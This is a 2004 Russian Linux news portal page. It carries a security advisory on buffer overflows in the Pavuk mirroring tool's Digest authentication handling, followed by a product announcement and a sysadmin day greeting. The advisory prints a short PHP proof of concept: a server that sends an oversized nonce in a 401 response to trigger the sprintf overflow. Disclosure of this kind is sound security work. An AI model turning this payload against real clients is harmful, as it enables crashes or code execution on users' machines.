Наши
Сайдбары   		 IRC-канал
Linuxportal.ru   		 Импорт новостей
  		Вход Быстрая регистрация На главную
   ФОРУМЫ      БИБЛИОТЕКА      ССЫЛКИ      НОВОСТИ       БЛОГ АДМИНА

Поиск:
 
   КАЛЕНДАРЬ
     Выберите дату новости:		  

<Июль 2004 >
ПН ВТ СР ЧТ ПТ СБ ВС
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31  
Новостные рубрики:
   НОВОСТИ без границ
     Самые свежие и ключевые новости:		  

Безопасность
Infosec news [eng]
Компьютерная безопасность [rus]
Программы
SourceForge.net [eng]
Freshmeat.net [eng]
KernelTrap [eng]
Документация
The Linux Documentation Project [eng]
Linux.com Documentation [eng]
Разное
Slashdot [eng]
DevChannel Development tools [eng]
OSDN.com [eng]
Kernel Traffic [eng]
Wine Traffic [eng]
Linux Journal [eng]
Бонус
Linux.com Main [eng]
Newsforge Reports [eng]
Newsforge NewsVac [eng]
LWN.net [eng]
KDE Traffic [eng]
GNUe Traffic [eng]
WorldWatch [eng]
Debian Planet [eng]
PCLinuxOnline [eng]
DesktopLinux [eng]
*nix project [rus]

  НОВОСТИ    

30.07.2004

Несколько переполнений буфера в Pavuk

"Pavuk is UNIX program used to mirror contents of WWW documents or files. It transfers documents from HTTP, FTP, Gopher and optionaly from HTTPS (HTTP over SSL) servers. Pavuk has an optional GUI based on GTK2 widget set."

Несколько переполнений буфера обнаружено в Pavuk в обработке ответов Digest аутентификации. Удаленный пользователь может выполнить произвольный код на целевой системе.

Удаленный пользователь может послать специально обработанное HTTP 401 сообщение, которое включает Digest ответ с чрезмерно длинными значениями в некоторых полях, чтобы вызвать переполнение буфера. Уязвимость связана с небезопасным вызовом функции sprintf().

Пример/Эксплоит:

$buffer = "";
for ($i = 0; $i < 1024; $i++) {
$buffer .= "A";
}
header("WWW-Authenticate: Digest realm=\"Secured by Digest Auth\"
opaque=\"opaque\" nonce=\"$buffer\"");
header("Status: 401 Not Authorized");
?>

San АНДРЕЕВ | 30.07.2004 | 16:02 | Источник: | Комментариев: 0

SchoolLINUX.com представляет школьный терминал-сервер

Компания SchoolLINUX.Com объявляет о выпуске продукта под названием Thin-SERVER "The Windows Terminal Server Powered by LINUX". Идея достаточно стандартна: используется терминал-сервер под управлением Microsoft Windows и ряд бездисковых терминалов-"тонких клиентов", базирующихся на Linux. Система предназначена для использования в школах и позволяет снизить расходы на IT благодаря продлению срока службы компьютерной техники (в качестве терминалов могут использоваться достаточно старые машины).
San АНДРЕЕВ | 30.07.2004 | 15:51 | Источник: | Комментариев: 2

С праздником!!!

Особый день, раз в году, для того, чтобы признать ценность и важность того, кто занимает это место, особенно потому, что это зачастую человек, благодаря которому колеса компании продолжают вращаться.

Этот день касается многих
системных администраторов:


- Компьютерные администраторы
- Сетевые администраторы
- Web-мастерЫ
- Администраторы голосовой почты
- Администраторы баз данных (DBA)
- Администраторы почтовых систем
- Системные программисты мэйнфреймов
- Администраторы домашних сетей
- Администраторы 1С: и других программ
- Администраторы телефонной и сотовой связи


Evgen | 30.07.2004 | 06:12 | Источник: | Комментариев: 3




Предыдущие новости Следующие новости

©"Linuxportal.Ru". Материалы сайта можно
использовать свободно при условии
сохранения этой свободы при дальнейшем
распространении, если явно не указано иное
Дизайн и программирование:


Powered by pMachine Pro 2.3
Поставьте
нашу кнопку:
Получить код кнопки 		Linux Portal.ru ::: Линукс Портал.ру
Наш партнер: